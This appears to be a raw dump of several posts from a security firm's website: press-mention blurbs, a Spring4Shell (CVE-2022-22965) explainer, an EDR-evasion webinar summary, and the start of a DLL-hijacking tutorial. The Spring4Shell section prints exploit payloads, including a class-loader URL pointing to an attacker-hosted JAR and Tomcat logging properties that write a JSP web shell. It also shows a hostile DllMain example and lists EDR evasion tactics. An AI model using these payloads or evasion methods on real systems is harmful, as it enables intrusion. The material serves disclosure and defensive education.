[post_title] => SecurityWeek: Cyber Insights 2023 | Artificial Intelligence [post_excerpt] => NetSPI Director of Research Nick Landers was featured in the SecurityWeek article called Cyber Insights 2023 | Artificial Intelligence. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securityweek-cyber-insights-2023-artificial-intelligence [to_ping] => [pinged] => [post_modified] => 2023-02-16 17:27:12 [post_modified_gmt] => 2023-02-16 23:27:12 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29374 [menu_order] => 140 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 29117 [post_author] => 17 [post_date] => 2022-12-29 09:00:00 [post_date_gmt] => 2022-12-29 15:00:00 [post_content] =>

On December 29, NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. Read the preview below or view it online.

+++

Scott Sutherland, VP of Research, NetSPI

Can DTL Help Stop Software Supply Chain Attacks?

Adoption of distributed ledger technology (DTL) is still in its infancy and we’ll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several “supply chain compromises'' that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem.

Nick Landers, VP of Research, NetSPI

By the end of next year every major financial institution will have announced adoption of Blockchain technology.

There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.

You can read the full article at Enterprise Security Tech!

[post_title] => Enterprise Security Tech: 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain [post_excerpt] => NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => enterprise-security-tech-2023-cybersecurity-predictions [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:09:57 [post_modified_gmt] => 2023-01-23 21:09:57 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29117 [menu_order] => 157 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 28916 [post_author] => 17 [post_date] => 2022-11-29 15:15:00 [post_date_gmt] => 2022-11-29 21:15:00 [post_content] =>

On November 29, both Vice President of Research, Scott Sutherland and Nick Landers, were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. Read the preview below or view it online.

+++

What will the New Year bring in cyberspace? Here's a roundup of some of the top security industry forecasts, trends and cybersecurity predictions for 2023. Where do things go from here?

Read on as 18 industry leaders in the security space come together to provide their insights into how the cybersecurity industry will shake out in 2023.

NetSPI: Scott Sutherland, VP of Research - Can DTL Help Stop Software Supply Chain Attacks? 

"Adoption of distributed ledger technology (DTL) is still in its infancy and we'll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several "supply chain compromises'' that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem."

+++

NetSPI: Nick Landers, VP of Research - By the end of next year every major financial institution will have announced adoption of Blockchain technology

"There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains. 

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven't already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts.Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was "secure by default", think again. Just like cloud platform adoption, the promises of "secure by default" will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech."

You can read the full article at VMblog!

[post_title] => VMBlog: 18 Security Leaders Come Together to Share Their 2023 Predictions [post_excerpt] => On November 29, VPs of Research, Scott Sutherland and Nick Landers, were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => vmblog-security-leaders-share-2023-predictions [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:01 [post_modified_gmt] => 2023-01-23 21:10:01 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28916 [menu_order] => 167 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 28197 [post_author] => 77 [post_date] => 2022-08-09 13:16:00 [post_date_gmt] => 2022-08-09 18:16:00 [post_content] =>

On August 9, NetSPI Head of Adversarial R&D Nick Landers was featured in the Dark Reading article called Abusing Kerberos for Local Privilege Escalation. Read the preview below or view it online.

+++

As the main authentication protocol for Windows enterprise networks, Kerberos has long been a favored hacking playground for security researchers and cybercriminals alike. While the focus has been on attacking Kerberos authentication to carry out remote exploits and aid in lateral movement across the network, new research explores how Kerberos can also be abused to great effect in carrying out a variety of local privilege escalation (LPE) attacks.

At the Black Hat USA conference this week in Las Vegas, James Forshaw, security researcher for Google Project Zero, and Nick Landers, head of adversarial R&D for NetSPI, plan to take the security discussion beyond the Kerberoasting and Golden/Silver ticket attack discussions that have dominated Kerberos security research in recent years. In the session "Elevating Kerberos to the Next Level," Forshaw and Landers will explore authentication bypasses, sandbox escapes, and arbitrary code execution in privileged processes.

"James and I have both spent a lot of our time digging into Windows internals, and Kerberos is fundamental to network authentication between Windows systems. However, most of the existing research and tooling I've done focuses on remote exploitation — ignoring attack surfaces that exist on just a local machine," says Landers, who explained why the pair decided to dig deeper into design flaws in the way Kerberos does local authentication. "Through this, we've discovered many interesting flaws — some fixed and some not — that we're excited to share on Wednesday, along with the tooling we’ve built and knowledge we've gained over the last several months."

The tooling will help others in the security research community to inspect and manipulate Kerberos on local systems to build on the pair's research. The duo will also offer up some important detection and configuration advice to help security practitioners mitigate the risk of the flaws that they'll present.

You can read the full article on Dark Reading!

[post_title] => Dark Reading: Abusing Kerberos for Local Privilege Escalation [post_excerpt] => On August 9, NetSPI Head of Adversarial R&D Nick Landers was featured in the Dark Reading article called Abusing Kerberos for Local Privilege Escalation. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dark-reading-abusing-kerberos-for-local-privilege-escalation [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:22 [post_modified_gmt] => 2023-01-23 21:10:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28197 [menu_order] => 219 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 27620 [post_author] => 77 [post_date] => 2022-04-06 15:00:00 [post_date_gmt] => 2022-04-06 20:00:00 [post_content] =>

On March 29, 2022, organizations experienced widespread concern when the Spring4Shell vulnerability was disclosed. Since then, we’ve noticed a sense of confusion around the remote code execution (RCE) vulnerability and its impact.  

Before we dive into the vulnerability details, here are four facts to help you understand what Spring4Shell really is – and its intricacies: 

  • The vulnerability was leaked ahead of CVE publication and ahead of the emergency releases planned by the Spring Framework team. This small window gave time for individuals to speculate on total impact and spread unfounded claims.
  • The name “Spring4Shell” was sometimes used for both this issue (CVE-2022-22965) and another Spring vulnerability (CVE-2022-22963) related to Cloud Function Expressions. However, these vulnerabilities are unrelated and should be handled independently.
  • Spring4Shell is actually a bypass for a fixed issue from 12 years ago, CVE-2010-1622, which involves the same abuse of nested properties to access class loader objects. The issue itself stems from insecure coding patterns that Spring recommends avoiding. In addition, it depends on specific deployment and environmental requirements. All of this makes it difficult to identify affected applications. We’ll cover detection in detail later in this blog.
  • Impact is still to be determined, as there are conflicting claims about Spring4Shell being actively exploited. Initial reports compare it to Log4Shell, which has been leveraged in many known attacks since disclosure. But after analysis of the initial report, it is still unclear how many applications are truly vulnerable to attacks.  

In summary, this vulnerability was prematurely leaked shortly after the publication of another unrelated Spring issue. The name “Spring4Shell” was quickly abused in reference to the recent “Log4Shell” issue, despite the vulnerabilities having significantly different impact. Misinformation about the vulnerability quickly circulated while the Spring team was still preparing its patches and technical guidance. 

As we monitor the situation closely, we will update this blog with new details. Continue reading to learn what we know so far and how we’ve optimized NetSPI’s Attack Surface Management platform to help organizations identify vulnerable instances of Spring Framework. 

Current Status: On March 31, 2022, a patch was released by the Spring team for CVE-2022-22965

What is Spring4Shell? 

Spring4Shell is a vulnerability found in the Java Spring Core framework that could allow for remote code execution (RCE) on web servers around the world. As noted above, this issue is almost identical to an older vulnerability from 2010 and if exploited, could allow attackers to write files to the underlying web server host, modify system configurations, or upload web shells for code execution.  

The popularity of VMWare-owned Spring and the prematurely released proof of concept (PoC) generated lofty expectations of abuse. However, nuances in the technical details have revealed exploitation is slightly more than trivial and dependent on specific coding practices and deployment environments. 

Follow along with us as we breakdown the technical details of the issue, who exactly is affected, and how to handle the next round of vulnerability panic. 

Technical Overview 

Underneath, the vulnerability depends on the unsecured use of basic Java objects (POJOs) as parameters in request mappings. The Spring MVC supports this concept to simplify the mapping of HTML form bodies to objects. Here is an example of this feature in use: 

public class User { 
    public String name; 
 
 
    public String getName(); 
    public void setName(String name); 
} 
 
 
@RequestMapping("/adduser") 
public User addUser(User user) { 
    return user; 
} 

This code is convenient, but technically goes against guidance from Spring by not configuring allowFields on the DataBinder. It’s the novelty of this specific pattern that casts uncertainty on how many applications might be affected. We can leverage this endpoint to create a new User object with the following request. 

POST /adduser HTTP/1.1 
 
name=Nick 

Upon receiving the request, Spring (specifically the Beans subsystem) will inspect the User class and try to assign properties to a new object based on the parameters provided. If a more complicated object was supplied, Spring would also allow us to supply nested properties such as this: 

POST /adduser HTTP/1.1 
 
address.city.name=NewYork 

Which, through reflection, would equate the following Java calls: 

UserObj.getAddress().getCity().setName("NewYork"); 

It’s here that we arrive at the primary concern. In the examples above, we’re assigning expected properties on our User object, but there are many other “hidden” properties that could be abused to access core internal classes in the Java framework. This was originally disclosed in CVE-2010-1622, where the payload accessed the URLs on a nested Class Loader object: 

class.classLoader.URLs[0]=jar:https://attacker/evil.jar!/ 
 
UserObj.getClass().getClassLoader().getURLs()[0] = 
"jar:https://attacker/evil.jar!/"; 

While the original fix blocked access to the classLoader property, this issue resurfaced in JDK 9 where you could now access the module property on a class, and leverage the classLoader from that instead: 

class.module.classLoader... 
  
UserObj.getClass().getModule().getClassLoader()…;

In addition to restoring classLoader access, the leaked Spring4Shell proof of concept (PoC) took a different approach to achieving code execution. Rather than manipulating class loader URLs (which have since been more secured), the author used property walking to access the Tomcat logging class and reconfigure its properties to achieve an arbitrary file write. In the example below shell.jsp could be written to any filesystem path with the supplied contents from the pattern property. 

class.module.classLoader.resources.context.parent.pipeline.first.
prefix=shell 
class.module.classLoader.resources.context.parent.pipeline.first.
suffix=.jsp 
class.module.classLoader.resources.context.parent.pipeline.first.
pattern=[Content] 
class.module.classLoader.resources.context.parent.pipeline.first.
directory=[Path] 

The new fix for this vulnerability more thoroughly inspects properties to block access to the classLoader and protectionDomain irregardless of where they fall in the object graph. However, even Spring notes that this doesn’t prevent the abuse of unrestricted parameter bindings in more specific cases. Developers should understand the implications of this feature and follow the hardening guidance from Spring whenever possible. 

Am I Affected by Spring4Shell? 

Exploitation of the vulnerability depends on specific coding patterns and deployment environments, both of which make the issue difficult to identify with simple scanners. Any individual web endpoint (authenticated or not) in an application could be affected. As a first step, we encourage you to connect directly with your development teams to assess application dependency trees.  

According to the Spring team’s report, those who meet the following criteria are affected by the Spring4Shell vulnerability.  

  • Java Development Kit (JDK) 9 or higher 
  • Apache Tomcat as the Servlet container 
  • Packaged as a traditional WAR (in contrast to a Spring Boot executable jar) 
  • Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions 
  • spring-webmvc or spring-webflux dependency 

Spring4Shell Detection 

For better or worse this vulnerability is difficult to detect remotely from a blind context. As mentioned, any endpoint in an application might be affected and requirements like authentication might result in many false negatives. Here is a breakdown of our recommended detection strategies to follow: 

  • Contact internal development teams to identify custom applications that leverage the Spring framework. Vulnerable versions are noted above and there are multiple options for patching and mitigations. There are also local scanners available to help search for affected JAR files on the system.
  • Monitor vendor sites for the references to CVE-2022-22965/Spring4Shell to identify and patch 3rd party applications.
  • External web requests can be used as a primitive detection for this vulnerability. When certain invalid data is provided for property resolution, the server might often return a different status code (400/500). Scanners can perform multiple requests against web endpoints to identify variable status codes based on input. This is a good indication that access to nested classLoader objects is allowed.  

Additionally, NetSPI has optimized our Attack Surface Management (ASM) platform to detect Spring4Shell at scale and in unique scenarios. Our team of expert pentesters, researchers, developers, among others, research, triage, and discover new vulnerabilities daily. As they are disclosed, new vulnerabilities are added to our ASM platform for continuous monitoring. For our current external network penetration testing customers, we have updated our processes to include Spring4Shell testing for in-scope projects. 

As ubiquitous vulnerabilities like Log4Shell and Spring4Shell become more prevalent, understanding your attack surface has never been more important. Those that proactively and continuously monitor and inventory their attack surface will be in better shape to find and address vulnerable instances of Spring Framework in a fast and comprehensive manner. 

Spring4Shell Remediation 

The Spring Framework team has since released fixes to the vulnerability. Make sure you update to Spring Framework 5.3.18 and 5.2.20 or greater. 

Where that isn’t possible, the following code can be added to secure parameter bindings, although Spring themselves notes this might not be comprehensive in every circumstance.  

@ControllerAdvice 
@Order(Ordered.LOWEST_PRECEDENCE) 
public class BinderControllerAdvice { 
 
    @InitBinder 
    public void setAllowedFields(WebDataBinder dataBinder) { 
         String[] denylist = new String[]{"class.*", "Class.*", 
         "*.class.*", "*.Class.*"}; 
         dataBinder.setDisallowedFields(denylist); 
    } 
 
} 

If you are running older Spring Framework versions or can’t make the update, Spring published these workarounds for you.  

Additionally, Apache Tomcat, one of the preconditions, released new versions to close the attack vector on Tomcat’s side. In their post, they point to the importance of having multiple mitigation options that “provide flexibility and layered protection.” 

When seemingly critical vulnerabilities like Spring4Shell are brought to light, it’s important to identify reliable resources and peers that can help you understand the vulnerability nuances.  

We hope this blog helped you better understand the vulnerability, its impact, and your options for detection and remediation. NetSPI is available to walk through our detection process and help you navigate the complexities this vulnerability presents. Please contact us to learn more. 

Do you use vulnerable versions of the Spring Framework?

[post_title] => Navigating the Complexities of Spring4Shell [CVE-2022-22965] [post_excerpt] => Explore the intricacies of Spring4Shell discovery and remediation and learn how the vulnerability [CVE-2022-22965] may impact you. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => spring4shell [to_ping] => [pinged] => [post_modified] => 2023-06-12 13:45:20 [post_modified_gmt] => 2023-06-12 18:45:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27620 [menu_order] => 274 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 25902 [post_author] => 77 [post_date] => 2021-07-12 15:56:00 [post_date_gmt] => 2021-07-12 20:56:00 [post_content] =>

On July 12, 2021, NetSPI Director of Research Nick Landers was featured in an article from SC Magazine:

Endpoint detection and response systems can often serve as a frontline defense for many organizations, collecting and storing telemetry from dispersed employee devices and using it to detect malicious activities or behaviors. However, a recent experiment by academic researchers at the University of Piraeus in Greece indicates they are far from a silver bullet when it comes to protecting your organization....

Nick Landers, director of research at penetration testing company NetSPI, told SC Media that that it’s rare for one team or company to even have access to such a wide range of EDR systems and any research that can test and compare different products in the EDR market is valuable in and of itself. 

He said the results outlined in the study largely mirror his experience with customers, and that many advanced threat actors generally rely on two strategies for evading detection by EDR systems: using completely unique or novel tactics that can frustrate heuristic analysis or data algorithms, and “not making noise in general” by understanding what telemetry EDR systems collect and measure.

“I think the ones we see that are the most effective are ones where the attacker understands the data [the EDR system is] collecting and keeps generation of that data low,” he said. 

However, Landers said his main takeaway from the study is not necessarily that EDR products are shoddy or not worth the cost (though he again lamented the lack of access that independent third parties typically have to test such systems), but rather a “more constructive” reinforcement of the need for multiple layers of security to ensure any one tool or process doesn’t become a single point of failure.

“I think looking at the minutiae and finger-pointing and trying to identify specific products and their specific failings is a fault that belongs to everyone in the industry,” he said. “But [EDR systems] are valuable tools and while I might not agree with their strategy or their marketing or cost or licensing model or availability, I think they do contribute to a defense in depth strategy and that’s ultimately what we should all be striving for.”

To learn more, read the full article here: https://www.scmagazine.com/news/network-security/edr-alone-wont-protect-your-organization-from-advanced-hacking-groups

[post_title] => SC Magazine: EDR (alone) won’t protect your organization from advanced hacking groups [post_excerpt] => On July 12, 2021, NetSPI Director of Research Nick Landers was featured in an article from SC Magazine. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => edr-alone-wont-protect-your-organization-from-advanced-hacking-groups [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:58 [post_modified_gmt] => 2022-12-16 16:51:58 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25902 [menu_order] => 374 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 25473 [post_author] => 53 [post_date] => 2021-05-26 19:16:27 [post_date_gmt] => 2021-05-26 19:16:27 [post_content] =>
Watch Now

Overview 

Endpoint detection and response (EDR) tools are quickly becoming the standard protection against today’s adversaries. Yet, much like the solutions before them – legacy antivirus – attackers are already researching, publishing, and deploying novel techniques to understand and evade modern EDR products.

To stay one step ahead of the stealthiest cyber adversaries, red teams and penetration testers must study and simulate real defensive evasion techniques to identify weaknesses in their organization’s defense in depth, and security leaders must gain a better understanding of the EDR technologies they invest in. 

During this webinar led by NetSPI VP of Research Nick Landers, viewers will:

  • Explore the role that modern EDRs play and tips for evaluating vendors  
  • Review the latest defensive evasion techniques sophisticated adversaries deploy to bypass EDR tools  
  • Discover helpful resources for staying up to date with modern research and techniques  
  • Learn how to effectively implement the defensive evasion techniques within your own red team operations

Key highlights: 

The transition from classic antivirus to EDR and other solutions  

For about 30 years, it’s been widely known that antivirus software isn’t perfect and presents tricky challenges. The table below outlines antivirus strategies and associated evasions.

Antivirus StrategiesAntivirus Evasions
ChecksumsCompare the SHA/MD5 hash to verify system integrity, match a known malicious sample, or mark an affected software version.Make small binary changes to manipulate hashes. Re-use system binaries for functionality. Side-load modules for persistence.
SignaturesCompare byte level contents of file data, file system structures, MBR, etc. to match known malicious patterns.Chunk samples and identify affected portions in sequence. Obfuscate/pack executable code. Scan signature files for matches.
SandboxingDetonate payloads in controlled environments to track heuristic behaviors and flag known patterns.Detect sandbox environments before execution. Deliver stages from servers with intelligence. Force user interaction.
Data miningUse a known data set of malicious and benign samples to train generic algorithms and/or build signatures.Monitor popular data sources (VirusTotal), Perform in-memory manipulation/execution to evade statically-sourced detections.
Real timeMonitor open file handles, system events, application installs, etc., to identify dangerous behavior.Avoid using disk components where possible. Prefer OS internals for persistence as opposed to full software packages.

Despite common evasion techniques, antivirus has made some progress, such as:

  • Traditional antivirus  
  • The need for signatures/rules never goes away 
  • Years of public research offered a convenience set of “problems” to fix 
  • Many well-known antivirus vendors now sell EDR as an additional product  

The technical case for EDR products  

When it comes to the technical case, at a high level, it’s important to think about how EDR solutions differ from antivirus and what EDR products have to do. There are three main components that they have to design, all of which have nuances and caveats, as well as flaws that an attacker can try to abuse or disrupt.  

The three main components include:

  • Data generation
    • Process creation 
    • Network traffic 
    • File write/read events 
    • Sandboxing 
    • Library load events 
    • Kernel callbacks
  • Data collection 
    • Event forwarding 
    • Agent stability 
    • Data integrity 
    • Network uptime 
    • Privilege separation 
    • Performance impact
  • Data response 
    • Dashboards 
    • Risk scoring 
    • Processing delay 
    • Baselining 
    • Remote isolation 
    • Network scaling  

General EDR evasion strategies  

It’s important to have a holistic view of common EDR evasion strategies — and four common strategies often come to mind.

Typical evasion strategies include:

  • Use obscurity to avoid known/common event patterns 
    • Just like defense, obscurity alone is a weak strategy 
  • Challenge assumptions about OS internals and subsystems 
    • The advantage always lies in understanding the battlefield  
  • Disable event sources to break data collection 
    • ETW, AMSI, user mode hooks, etc.  
  • Avoid transitions to reduce detection surface, as you are most vulnerable in transition  

Hopeful solutions  

When discussing possible solutions, machine learning (ML) and artificial intelligence (AI) need to be part of the conversation. The two terms are often used interchangeably and AI is more commonly used than ML, but this topic in particular focuses more on machine learning.  

Machine learning captures the attention of investors and common terms or statements associated with the concept include, “analyzes millions of data points and adapts,” “high degree of confidence," and “next generation.” However, in addition to being a trend or marketing buzzword, it’s important to understand what machine learning really is.

Overview of machine learning:

  • Set of techniques that aim to model a problem mathematical 
  • Essentially a combination of statistics, math, and computers 
  • Predictions without explicit programming 
  • Impressive results for the right problems 
  • Growing utility for every field 
    • Computing power is more available 
    • Data aggregation is common in systems 

Data presents several challenges or issues related to creating stronger defenses against threats.  

Issues associated with data include:

  • Better defenses demand we have more data 
    • More data to identify edge cases 
    • More data to reduce false positives 
    • More data to contextualize complex attacks 
  • New telemetry doesn’t replace existing data 
    • File hashes and content still need to be reviewed 
    • Network traffic still needs to be analyzed 
    • Spam and phishing emails still need to be identified  
  • Data in some places is approaching zettabytes in scale 
  • Given the points above, machine learning is almost the only solution; it can’t be done any other way 

Machine learning is often seen as the next solution to solve attacks. While it is a buzzword that gets thrown around in marketing materials to sell products, in security, machine learning is primarily used for classification. Methods are also tried and true, as opposed to advanced methods, and include decision trees and gradient boosting.

Here’s an example of a machine learning strategy for EDR:

  1. Collect a data set for analysis 
    • Example: EMBER/SOREL dataset for PE files 
    • One file type from one platform doesn’t represent “malware” 
  2. Select feature set for learning
    • Consider the context of that data (packed PE vs loaded code) 
    • Exports/Entropy/Runtime API calls/String/Raw data
  3. Make the model actionable 
    • Does data in the real world match the features in the model? 
    • Can you test against models fast enough in real time? 
    • Domain knowledge is required (know any data science/malware authors?) 

While machine learning has many benefits, it isn’t without risks.

Machine learning risks include, but aren’t limited to:

  • Data privacy is a real concern for training data 
    • Anonymization techniques can’t be perfect 
    • Extracting information from models 
  • Models, once trained, are difficult to adjust manually 
  • Once understood, offensive attacks are trivial 
    • “It’s not even a question, there are no defenses, there are no detections, there’s barely any lagging.” - @moo_hax 
    • Model stealing requires very limited information (just a score) 
    • Machine learning systems engineers aren’t thinking about security yet 
  • Bypassing an algorithm will always be easier than a human  

Where does this leave us?  

Here are some final considerations to keep in mind about EDR tools:

  • Almost everything “new” is just a fresh decal on existing engines made by the same people at the same companies 
  • Products continue to demand more data, charging customers for the privilege to share, and rolling that data into future products 
  • Machine learning/AI is mainly a new buzzword like app whitelisting, command line logging, zero trust, etc.  
  • Alert fatigue and poor scoring is a huge issue, even more than lack of telemetry 
  • Attackers are achieving a very deep understanding of OS internals and the same should be asked of EDR vendors both in communications and implementations 
  • Nothing will ever be a silver bullet, effective security will always be about defense in depth 
  • Consider the multitude of free solutions available and opportunities to layer projects and mitigations  

With these considerations in mind, here a few questions to ask vendors when evaluating EDR tools:

  • What data would you collect from our network and how would the data be used? 
  • Does your product make use of the kernel driver component? 
  • Are you a member of the Microsoft Virus Initiative? (MVI)  
  • What do you use to measure solution effectiveness? 
  • What metrics do you use for testing changes in QA? 
  • Do you perform any public third party testing to verify the integrity of your solutions? Can we see any report? 

Improve your security controls with NetSPI  

While EDR tools offer businesses some security benefits, these tools also have flaws and threat actors have identified several evasion strategies. As a result, only 20 percent of common attack behaviors are caught by EDR, SIEM, and MSSP out-of-the-box solutions. 

While 100 percent detection doesn’t exist, EDR tools alone are not enough. NetSPI’s Breach and Attack Simulation (BAS) can improve your security controls by delivering a centralized detective control platform that enables you to create and execute customized procedures utilizing purpose-built technology.

Professional human pentesters simulate real-world attacker behaviors, not just indicators of compromise (IOCs), putting your detective controls to the test in a way no other BAS solution can. Learn more about NetSPI’s BAS offerings or connect with an expert team member by scheduling a demo today.

[wonderplugin_video iframe="https://youtu.be/6OF6lA0kCuY" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Understanding Modern EDR Tools: How They Work, How They Provide Value, and How to Bypass Them [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => understanding-modern-edr-tools [to_ping] => [pinged] => [post_modified] => 2023-08-22 10:04:20 [post_modified_gmt] => 2023-08-22 15:04:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=25473 [menu_order] => 53 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 23530 [post_author] => 77 [post_date] => 2020-02-19 07:00:45 [post_date_gmt] => 2020-02-19 13:00:45 [post_content] =>

DLL hijacking has been a centerpiece of our operations for many years. During that time we’ve explored the deep caveats which make this technique difficult to actually use in the real world. Our implementations have expanded to include export table cloning, dynamic IAT patching, stack walking, and run time table reconstruction. We explore the details of these techniques extensively in our Dark Side Ops courses and we’d like to share some of that knowledge here.

If you’ve ever “understood” DLL hijacking, only to return to your lab and fail to get it working properly, this post is for you.

TLDR? Check out Koppeling. You really should read it though 

Refresher

This post won’t cover the basics of DLL hijacking. We expect you are familiar with module search order, KnownDLLs, “safe search”, etc. If you need a refresher, here are some links:

In addition, some tooling designed to discover/exploit hijacks:

When you first learned about DLL hijacking, you were likely shown a fairly primitive example which is trivial to exploit. Something like this:

void BeUnsafe() {
	HMODULE module = LoadLibrary("functions.dll");
	// ...
}

Here, we simply need to get some evil code into the correct location as “functions.dll”. LoadLibrary will ultimately trigger the execution of our DllMain function, where we might write something like this:

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	// Do evil stuff
	system ("start calc.exe");

	return TRUE;
}

There are a few critical reasons exploitation is so trivial here. We’ll go through them here and then look at each one in more detail throughout the post.

  1. We don’t maintain the stability of the source process. In most instances, it will exit, crash, or otherwise misbehave as a result of our hijack. After all, it’s likely loading this DLL for a reason.
  2. We don’t maintain code execution in the source process. As an extension of 1, we are simply executing calc externally. We don’t care if the process stays up, or even what happens after we “pop our shell”.
  3. We don’t care about loader lock. Because our entry point is so simple, we don’t have to worry about executing complex code inside DllMain while the loader lock is held (which can be dangerous).
  4. We don’t have to worry about export names. Because this hijack occurs as a result of LoadLibrary, our malicious DLL doesn’t need to include any specific export names or ordinals.

If you’ve ever attempted to hijack in the real world, and something broke/failed, it was likely because of one (or many) of the 4 points above. Our time spent hijacking has yielded many tools and snippets which we’ll share throughout the post, so let’s get smarter.

Execution Sinks

There are two primary “sinks” from which DLL execution can originate. The names aren’t important, but we need consistent terminology to stay on the same page. Both of these sinks are provided by the module loader (LDR) within ntdll.dll. If an actor is interested in gaining execution as part of a DLL load, they require a call to ntdll!LdrpCallInitRoutine, triggering execution of evil!DllMain.

Static Sink (IAT)

The most obvious cause for DLL initialization is the result of its inclusion in a dependency graph. Specifically, it’s membership of a required module’s import address table (IAT). This will most likely occur during process initialization (ntdll!LdrpInitializeProcess), but can also occur as a result of dynamic loading.

Here, the subsystem is simply calculating all required dependencies for a particular load event, and sequentially initializing them. However, before passing execution to the new module, it’s export table will be examined to ensure it provides the expected functionality. This is done by comparing the EAT of the child module and patching those addresses into the IAT of the parent module. A typical call stack looks something like this:

ntdll!LdrInitializeThunk <- New process starts
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!LdrpInitializeProcess
ntdll!LdrpInitializeGraphRecurse <- Dependency graph is built
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- Execution is passed to external code

Dynamic Sink (LoadLibrary)

In a similar, but distinctly different process, active code is requesting a new module be initialized without specifying required functions. As a result, ntdll!LdrLoadDll will happily ignore the export table of the target module. This will likely be followed by GetProcAddress in an attempt to identify a particular function for run time use, but not always.

The dependency graph will be calculated with the requested module at its root and load events will occur as described above. This call stack looks something like this:

KernelBase!LoadLibraryExW <- Dynamic module load is requested
ntdll!LdrLoadDll
ntdll!LdrpLoadDll
ntdll!LdrpLoadDllInternal
ntdll!LdrpPrepareModuleForExecution
